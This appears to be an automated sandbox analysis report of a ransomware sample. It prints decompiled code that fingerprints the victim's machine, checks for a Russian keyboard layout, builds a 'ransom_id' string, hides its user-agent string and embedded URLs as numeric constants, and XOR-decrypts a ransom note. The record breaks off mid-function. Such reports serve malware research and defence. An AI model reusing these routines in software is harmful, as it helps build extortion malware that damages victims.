                                    0x00000000
                                    0x00000000
                                    0x0f5877a7
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f58778b
                                    0x0f58775f
                                    0x0f58760d
                                    0x0f587616
                                    0x0f587620
                                    0x0f587623
                                    0x0f587625
                                    0x0f587628
                                    0x0f58762d
                                    0x0f587634
                                    0x0f58763d
                                    0x0f58763f
                                    0x0f587642
                                    0x0f58764c
                                    0x0f58765f
                                    0x0f587667
                                    0x0f5876c4
                                    0x0f5876c4
                                    0x0f5876c6
                                    0x00000000
                                    0x0f5876c6
                                    0x0f58766c
                                    0x0f587681
                                    0x0f587689
                                    0x0f587694
                                    0x0f58768b
                                    0x0f58768b
                                    0x0f58768b
                                    0x0f58769d
                                    0x0f5876a7
                                    0x00000000
                                    0x0f5876a9
                                    0x0f5876b9
                                    0x0f58779a
                                    0x0f58779c
                                    0x0f5877a1
                                    0x0f5877a1
                                    0x0f5876bf
                                    0x0f5876bf
                                    0x0f5876c9
                                    0x0f5876c9
                                    0x0f5876de
                                    0x0f5876e0
                                    0x0f5876ed
                                    0x00000000
                                    0x0f5876f3
                                    0x0f58756e
                                    0x0f587570
                                    0x0f587573
                                    0x0f58758b
                                    0x0f587592
                                    0x0f58759a
                                    0x0f5875de
                                    0x0f5875e8
                                    0x0f5875ef
                                    0x00000000
                                    0x0f5875ef
                                    0x0f58759f
                                    0x0f5875b6
                                    0x0f5875be
                                    0x0f5875c9
                                    0x0f5875c0
                                    0x0f5875c0
                                    0x0f5875c0
                                    0x0f5875d2
                                    0x0f5875dc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f587502
                                    0x0f587510
                                    0x0f587512
                                    0x0f587517
                                    0x00000000
                                    0x00000000
                                    0x0f587519
                                    0x0f58752f
                                    0x0f587536
                                    0x0f587551
                                    0x0f587551
                                    0x0f587553
                                    0x00000000
                                    0x0f587553
                                    0x0f587538
                                    0x0f58753f
                                    0x00000000
                                    0x00000000
                                    0x0f587551
                                    0x00000000
                                    0x0f587551

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F5874B7
                                    • GetUserNameW.ADVAPI32 ref: 0F5874C8
                                    • VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F5874E6
                                    • GetComputerNameW.KERNEL32 ref: 0F5874F0
                                    • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F587510
                                    • wsprintfW.USER32 ref: 0F587551
                                    • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F58756E
                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
                                    • RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
                                    • GetLastError.KERNEL32 ref: 0F5875C9
                                    • RegCloseKey.KERNEL32(00000000), ref: 0F5875D2
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F5875EF
                                    • VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0F58760D
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F587623
                                    • wsprintfW.USER32 ref: 0F58763D
                                    • RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F58765F
                                    • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,0F584810,?), ref: 0F587681
                                    • GetLastError.KERNEL32 ref: 0F587694
                                    • RegCloseKey.KERNEL32(?), ref: 0F58769D
                                    • lstrcmpiW.KERNEL32(0F584810,00000419), ref: 0F5876B1
                                    • wsprintfW.USER32 ref: 0F5876DE
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5876ED
                                    • VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0F58770D
                                    • wsprintfW.USER32 ref: 0F587756
                                    • GetNativeSystemInfo.KERNEL32(?), ref: 0F587765
                                    • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0F587776
                                    • wsprintfW.USER32 ref: 0F58779A
                                    • ExitProcess.KERNEL32 ref: 0F5877A1
                                    • wsprintfW.USER32 ref: 0F5877C9
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F587807
                                    • VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 0F58781A
                                    • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F587824
                                    • GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F58785E
                                    • lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587890
                                    • wsprintfW.USER32 ref: 0F5878C8
                                    • lstrcatW.KERNEL32 ref: 0F5878DD
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F5878E9
                                    • GetProcAddress.KERNEL32(00000000), ref: 0F5878F0
                                    • lstrlenW.KERNEL32(?), ref: 0F587900
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F587931
                                      • Part of subcall function 0F587B70: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F587B8D
                                      • Part of subcall function 0F587B70: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F587C01
                                      • Part of subcall function 0F587B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F587C16
                                      • Part of subcall function 0F587B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F587C2C
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F587988
                                    • GetDriveTypeW.KERNEL32(?), ref: 0F5879CF
                                    • lstrcatW.KERNEL32 ref: 0F5879F6
                                    • lstrcatW.KERNEL32 ref: 0F587A08
                                    • lstrcatW.KERNEL32 ref: 0F587A12
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,0F584810,?,00000000), ref: 0F587A28
                                    • lstrlenW.KERNEL32(?,?,00000000,0F584810,00000000,00000000,00000000,0F584810,00000000), ref: 0F587A70
                                    • wsprintfW.USER32 ref: 0F587A8A
                                    • lstrlenW.KERNEL32(?), ref: 0F587A98
                                    • wsprintfW.USER32 ref: 0F587AAC
                                    • lstrcatW.KERNEL32 ref: 0F587ABF
                                    • lstrcatW.KERNEL32 ref: 0F587ACB
                                    • lstrlenW.KERNEL32(?), ref: 0F587AE6
                                    • VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0F587B09
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0F587B30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
                                    • String ID: i)w$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                    • API String ID: 153366582-3138453034
                                    • Opcode ID: db598fd2247acd5e6e387bbb91f9700466951a2b3789d0d5468cdaf3fc115aab
                                    • Instruction ID: f5e740bde8b69a31add8ab3e31f9ba906fc42162dc3dd32bb0a4b36d1f2c38c9
                                    • Opcode Fuzzy Hash: db598fd2247acd5e6e387bbb91f9700466951a2b3789d0d5468cdaf3fc115aab
                                    • Instruction Fuzzy Hash: 2C12C170640305FBEB24AFA4DD45FAABBB4FF08701F200929F641B62D1D7B4A516DB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 169 f587e40-f58802b InternetOpenW 170 f58802d-f58803f InternetOpenW 169->170 171 f588042-f588048 169->171 170->171
                                    C-Code - Quality: 100%
                                    			E0F587E40(void* __ecx) {
                                    				short _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				intOrPtr _v124;
                                    				intOrPtr _v128;
                                    				intOrPtr _v132;
                                    				intOrPtr _v136;
                                    				intOrPtr _v140;
                                    				intOrPtr _v144;
                                    				intOrPtr _v148;
                                    				intOrPtr _v152;
                                    				intOrPtr _v156;
                                    				intOrPtr _v160;
                                    				intOrPtr _v164;
                                    				intOrPtr _v168;
                                    				intOrPtr _v172;
                                    				intOrPtr _v176;
                                    				intOrPtr _v180;
                                    				intOrPtr _v184;
                                    				intOrPtr _v188;
                                    				intOrPtr _v192;
                                    				intOrPtr _v196;
                                    				intOrPtr _v200;
                                    				intOrPtr _v204;
                                    				intOrPtr _v208;
                                    				intOrPtr _v212;
                                    				intOrPtr _v216;
                                    				intOrPtr _v220;
                                    				short _v224;
                                    				WCHAR* _t62;
                                    				void* _t64;
                                    
                                    				_v8 = 0;
                                    				_v224 = 0x6f004d;
                                    				_v220 = 0x69007a;
                                    				_v216 = 0x6c006c;
                                    				_v212 = 0x2f0061;
                                    				_v208 = 0x2e0035;
                                    				_v204 = 0x200030;
                                    				_v200 = 0x570028;
                                    				_v196 = 0x6e0069;
                                    				_v192 = 0x6f0064;
                                    				_v188 = 0x730077;
                                    				_v184 = 0x4e0020;
                                    				_v180 = 0x200054;
                                    				_v176 = 0x2e0036;
                                    				_v172 = 0x3b0031;
                                    				_v168 = 0x570020;
                                    				_v164 = 0x57004f;
                                    				_v160 = 0x340036;
                                    				_v156 = 0x200029;
                                    				_v152 = 0x700041;
                                    				_v148 = 0x6c0070;
                                    				_v144 = 0x570065;
                                    				_v140 = 0x620065;
                                    				_v136 = 0x69004b;
                                    				_v132 = 0x2f0074;
                                    				_v128 = 0x330035;
                                    				_v124 = 0x2e0037;
                                    				_v120 = 0x360033;
                                    				_v116 = 0x280020;
                                    				_v112 = 0x48004b;
                                    				_v108 = 0x4d0054;
                                    				_v104 = 0x2c004c;
                                    				_v100 = 0x6c0020;
                                    				_v96 = 0x6b0069;
                                    				_v92 = 0x200065;
                                    				_v88 = 0x650047;
                                    				_v84 = 0x6b0063;
                                    				_v80 = 0x29006f;
                                    				_v76 = 0x430020;
                                    				_v72 = 0x720068;
                                    				_v68 = 0x6d006f;
                                    				_v64 = 0x2f0065;
                                    				_v60 = 0x350035;
                                    				_v56 = 0x30002e;
                                    				_v52 = 0x32002e;
                                    				_v48 = 0x380038;
                                    				_v44 = 0x2e0033;
                                    				_v40 = 0x370038;
                                    				_v36 = 0x530020;
                                    				_v32 = 0x660061;
                                    				_v28 = 0x720061;
                                    				_v24 = 0x2f0069;
                                    				_v20 = 0x330035;
                                    				_v16 = 0x2e0037;
                                    				_v12 = 0x360033;
                                    				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
                                    				 *(__ecx + 4) = _t62;
                                    				if(_t62 == 0) {
                                    					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
                                    					 *(__ecx + 4) = _t64;
                                    					return _t64;
                                    				}
                                    				return _t62;
                                    			}




























































                                    0x0f587e58
                                    0x0f587e64
                                    0x0f587e6f
                                    0x0f587e79
                                    0x0f587e83
                                    0x0f587e8d
                                    0x0f587e97
                                    0x0f587ea1
                                    0x0f587eab
                                    0x0f587eb5
                                    0x0f587ebf
                                    0x0f587ec9
                                    0x0f587ed3
                                    0x0f587edd
                                    0x0f587ee7
                                    0x0f587ef1
                                    0x0f587efb
                                    0x0f587f05
                                    0x0f587f0f
                                    0x0f587f19
                                    0x0f587f23
                                    0x0f587f2d
                                    0x0f587f37
                                    0x0f587f41
                                    0x0f587f4b
                                    0x0f587f52
                                    0x0f587f59
                                    0x0f587f60
                                    0x0f587f67
                                    0x0f587f6e
                                    0x0f587f75
                                    0x0f587f7c
                                    0x0f587f83
                                    0x0f587f8a
                                    0x0f587f91
                                    0x0f587f98
                                    0x0f587f9f
                                    0x0f587fa6
                                    0x0f587fad
                                    0x0f587fb4
                                    0x0f587fbb
                                    0x0f587fc2
                                    0x0f587fc9
                                    0x0f587fd0
                                    0x0f587fd7
                                    0x0f587fde
                                    0x0f587fe5
                                    0x0f587fec
                                    0x0f587ff3
                                    0x0f587ffa
                                    0x0f588001
                                    0x0f588008
                                    0x0f58800f
                                    0x0f588016
                                    0x0f58801d
                                    0x0f588024
                                    0x0f588026
                                    0x0f58802b
                                    0x0f58803d
                                    0x0f58803f
                                    0x00000000
                                    0x0f58803f
                                    0x0f588048

                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
                                    • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InternetOpen
                                    • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                    • API String ID: 2038078732-2805935662
                                    • Opcode ID: 43eda7eb153750cf251a9508cb1ede0c79da4b0e82fd346071d385916bd76b98
                                    • Instruction ID: 5672efb346f68e9b87db7bb9083adcb45b8cdd0991eab0da747c6c53c0f5ba0e
                                    • Opcode Fuzzy Hash: 43eda7eb153750cf251a9508cb1ede0c79da4b0e82fd346071d385916bd76b98
                                    • Instruction Fuzzy Hash: 2B4197B4811358DEEB258F91999879EBFF5BB04748F50819ED5087B201C7F60A89CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 172 f5870a0-f5870b8 173 f5870ba-f5870da lstrcatW * 4 172->173 174 f5870dc-f5870df 172->174 173->174 175 f5870fd-f587101 174->175 176 f5870e1-f5870fb lstrcatW * 4 174->176 177 f58711f-f587123 175->177 178 f587103-f58711d lstrcatW * 4 175->178 176->175 179 f587141-f587145 177->179 180 f587125-f58713f lstrcatW * 4 177->180 178->177 181 f587163-f587167 179->181 182 f587147-f587161 lstrcatW * 4 179->182 180->179 183 f587169-f587183 lstrcatW * 4 181->183 184 f587185-f587189 181->184 182->181 183->184 185 f58718b-f5871a5 lstrcatW * 4 184->185 186 f5871a7-f5871ab 184->186 185->186 187 f5871c9-f5871cd 186->187 188 f5871ad-f5871c7 lstrcatW * 4 186->188 189 f5871eb-f5871ef 187->189 190 f5871cf-f5871e9 lstrcatW * 4 187->190 188->187 191 f58725c-f587260 189->191 192 f5871f1-f58720a VirtualAlloc 189->192 190->189 193 f58727e-f587292 lstrlenW 191->193 194 f587262-f58727c lstrcatW * 4 191->194 195 f58720c-f58721f wsprintfW 192->195 196 f587221-f58722d wsprintfW 192->196 194->193 197 f587230-f587256 lstrcatW * 4 VirtualFree 195->197 196->197 197->191
                                    C-Code - Quality: 100%
                                    			E0F5870A0(intOrPtr* __ecx, WCHAR* _a4) {
                                    				WCHAR* _t47;
                                    				intOrPtr* _t91;
                                    				intOrPtr _t94;
                                    				WCHAR* _t96;
                                    
                                    				_t91 = __ecx;
                                    				_t96 = _a4;
                                    				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
                                    					lstrcatW(_t96,  *(__ecx + 0x88));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x84));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *_t91 != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 4));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 8));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x10));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x14));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x1c));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x20));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x28));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x2c));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x34));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x38));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x40));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x44));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x4c));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x50));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x58));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x5c));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
                                    					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
                                    					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
                                    					_a4 = _t47;
                                    					if(_t94 == 0) {
                                    						wsprintfW(_t47, L"undefined");
                                    					} else {
                                    						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
                                    					}
                                    					lstrcatW(_t96,  *(_t91 + 0x64));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96, _a4);
                                    					lstrcatW(_t96, "&");
                                    					VirtualFree(_a4, 0, 0x8000); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x78));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x7c));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
                                    				return _t96;
                                    			}







                                    0x0f5870a4
                                    0x0f5870a7
                                    0x0f5870b8
                                    0x0f5870c1
                                    0x0f5870c9
                                    0x0f5870d2
                                    0x0f5870da
                                    0x0f5870da
                                    0x0f5870df
                                    0x0f5870e5
                                    0x0f5870ed
                                    0x0f5870f3
                                    0x0f5870fb
                                    0x0f5870fb
                                    0x0f587101
                                    0x0f587107
                                    0x0f58710f
                                    0x0f587115
                                    0x0f58711d
                                    0x0f58711d
                                    0x0f587123
                                    0x0f587129
                                    0x0f587131
                                    0x0f587137
                                    0x0f58713f
                                    0x0f58713f
                                    0x0f587145
                                    0x0f58714b
                                    0x0f587153
                                    0x0f587159
                                    0x0f587161
                                    0x0f587161
                                    0x0f587167
                                    0x0f58716d
                                    0x0f587175
                                    0x0f58717b
                                    0x0f587183
                                    0x0f587183
                                    0x0f587189
                                    0x0f58718f
                                    0x0f587197
                                    0x0f58719d
                                    0x0f5871a5
                                    0x0f5871a5
                                    0x0f5871ab
                                    0x0f5871b1
                                    0x0f5871b9
                                    0x0f5871bf
                                    0x0f5871c7
                                    0x0f5871c7
                                    0x0f5871cd
                                    0x0f5871d3
                                    0x0f5871db
                                    0x0f5871e1
                                    0x0f5871e9
                                    0x0f5871e9
                                    0x0f5871ef
                                    0x0f5871fc
                                    0x0f587202
                                    0x0f587205
                                    0x0f58720a
                                    0x0f587227
                                    0x0f58720c
                                    0x0f587216
                                    0x0f58721c
                                    0x0f587234
                                    0x0f58723c
                                    0x0f587242
                                    0x0f58724a
                                    0x0f587256
                                    0x0f587256
                                    0x0f587260
                                    0x0f587266
                                    0x0f58726e
                                    0x0f587274
                                    0x0f58727c
                                    0x0f58727c
                                    0x0f587288
                                    0x0f587292

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                    • String ID: %x%x$undefined
                                    • API String ID: 3872469520-3801831566
                                    • Opcode ID: 0cd3b4391d2c63211192b1c7f79840fa49f60f827fb5d8bd0323d603519b30f8
                                    • Instruction ID: 8217b8ec7758a150832e117d2c903c6ddb9c34be0b0b9604d55fddecea25f80f
                                    • Opcode Fuzzy Hash: 0cd3b4391d2c63211192b1c7f79840fa49f60f827fb5d8bd0323d603519b30f8
                                    • Instruction Fuzzy Hash: D6510B31146658B6DB273B618C49FEF3F59FF8A700F060060F9103845A8B699253EFEA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 198 f5842b0-f5842c5 199 f584598-f58459d 198->199 200 f5842cb-f584330 call f583bc0 call f587490 call f5872a0 VirtualAlloc 198->200 207 f584341 200->207 208 f584332-f58433b 200->208 210 f584343-f58438a call f5870a0 call f5881f0 lstrlenW 207->210 208->207 209 f58433d-f58433f 208->209 209->210 215 f584390-f5843a2 210->215 215->215 216 f5843a4 215->216 217 f5843b0-f5843bd 216->217 217->217 218 f5843bf-f5843dc call f5881f0 217->218 221 f5843de 218->221 222 f584456-f584545 218->222 225 f5843e0-f584406 lstrcpyW lstrlenW 221->225 223 f584578-f584593 VirtualFree call f587d70 222->223 224 f584547-f584562 VirtualAlloc 222->224 223->199 224->223 226 f584564-f584575 wsprintfW 224->226 225->222 228 f584408-f58440d 225->228 226->223 229 f584413-f58441b 228->229 230 f58441d 229->230 231 f584447-f584454 229->231 232 f584420-f584426 230->232 231->222 231->229 233 f58442c-f584432 232->233 234 f58459e-f5845a5 232->234 235 f58443d-f584441 233->235 236 f584434-f58443b 233->236 234->225 235->231 235->234 236->232 236->235
                                    C-Code - Quality: 49%
                                    			E0F5842B0(void* __ecx, void* __edx) {
                                    				char _v148;
                                    				char _v152;
                                    				WCHAR* _v156;
                                    				void* _v160;
                                    				intOrPtr _v168;
                                    				intOrPtr _v172;
                                    				intOrPtr _v176;
                                    				intOrPtr _v180;
                                    				intOrPtr _v184;
                                    				intOrPtr _v188;
                                    				intOrPtr _v192;
                                    				intOrPtr _v196;
                                    				intOrPtr _v200;
                                    				intOrPtr _v204;
                                    				intOrPtr _v208;
                                    				intOrPtr _v212;
                                    				intOrPtr _v216;
                                    				intOrPtr _v220;
                                    				intOrPtr _v224;
                                    				intOrPtr _v228;
                                    				intOrPtr _v232;
                                    				char _v236;
                                    				intOrPtr _v240;
                                    				void* _v244;
                                    				intOrPtr _v248;
                                    				intOrPtr _v252;
                                    				intOrPtr _v256;
                                    				intOrPtr _v260;
                                    				intOrPtr _v264;
                                    				intOrPtr _v268;
                                    				intOrPtr _v272;
                                    				intOrPtr _v276;
                                    				char _v280;
                                    				void* _t54;
                                    				void* _t58;
                                    				void* _t60;
                                    				signed int _t61;
                                    				void* _t62;
                                    				WCHAR* _t65;
                                    				signed short _t69;
                                    				signed short* _t70;
                                    				WCHAR* _t77;
                                    				signed int _t82;
                                    				signed int _t83;
                                    				void* _t87;
                                    				void* _t90;
                                    				long _t93;
                                    				WCHAR* _t94;
                                    				signed int _t97;
                                    				void* _t98;
                                    				WCHAR* _t100;
                                    				void* _t102;
                                    
                                    				if( *0xf592a64 != 0) {
                                    					L24:
                                    					return _t54;
                                    				}
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				E0F583BC0( &_v148);
                                    				E0F587490( &_v236, __edx); // executed
                                    				_t97 = E0F5872A0( &_v236);
                                    				_t93 = 0x42 + _t97 * 2;
                                    				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
                                    				_v244 = _t58;
                                    				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
                                    					_t98 = 0;
                                    				} else {
                                    					_t98 = _t58;
                                    				}
                                    				E0F5870A0( &_v152, _t98); // executed
                                    				_t60 = E0F5881F0(_t98, L"ransom_id=");
                                    				_t61 = lstrlenW(L"ransom_id=");
                                    				asm("movdqa xmm1, [0xf590510]");
                                    				_t77 = 0xf592000;
                                    				_t87 = 0xa3;
                                    				_t100 = _t60 + _t61 * 2;
                                    				_t62 = 0xa30;
                                    				_v160 = _t100;
                                    				do {
                                    					_t13 =  &(_t77[8]); // 0x44004e
                                    					_t77 = _t13;
                                    					asm("movdqu xmm0, [ecx-0x10]");
                                    					asm("pxor xmm0, xmm1");
                                    					asm("movdqu [ecx-0x10], xmm0");
                                    					_t87 = _t87 - 1;
                                    				} while (_t87 != 0);
                                    				do {
                                    					 *(_t62 + 0xf592000) =  *(_t62 + 0xf592000) ^ 0x00000005;
                                    					_t62 = _t62 + 1;
                                    				} while (_t62 < 0xa38);
                                    				 *0xf592a64 = 0xf592000;
                                    				_t94 = E0F5881F0(0xf592000, L"{USERID}");
                                    				if(_t94 == 0) {
                                    					L20:
                                    					_v280 = 0x740068;
                                    					_v276 = 0x700074;
                                    					_v272 = 0x3a0073;
                                    					_v268 = 0x2f002f;
                                    					_v264 = 0x770077;
                                    					_v260 = 0x2e0077;
                                    					_v256 = 0x6f0074;
                                    					_v252 = 0x700072;
                                    					_v248 = 0x6f0072;
                                    					_v244 = 0x65006a;
                                    					_v240 = 0x740063;
                                    					_v236 = 0x6f002e;
                                    					_v232 = 0x670072;
                                    					_v228 = 0x64002f;
                                    					_v224 = 0x77006f;
                                    					_v220 = 0x6c006e;
                                    					_v216 = 0x61006f;
                                    					_v212 = 0x2f0064;
                                    					_v208 = 0x6f0064;
                                    					_v204 = 0x6e0077;
                                    					_v200 = 0x6f006c;
                                    					_v196 = 0x640061;
                                    					_v192 = 0x65002d;
                                    					_v188 = 0x730061;
                                    					_v184 = 0x2e0079;
                                    					_v180 = 0x740068;
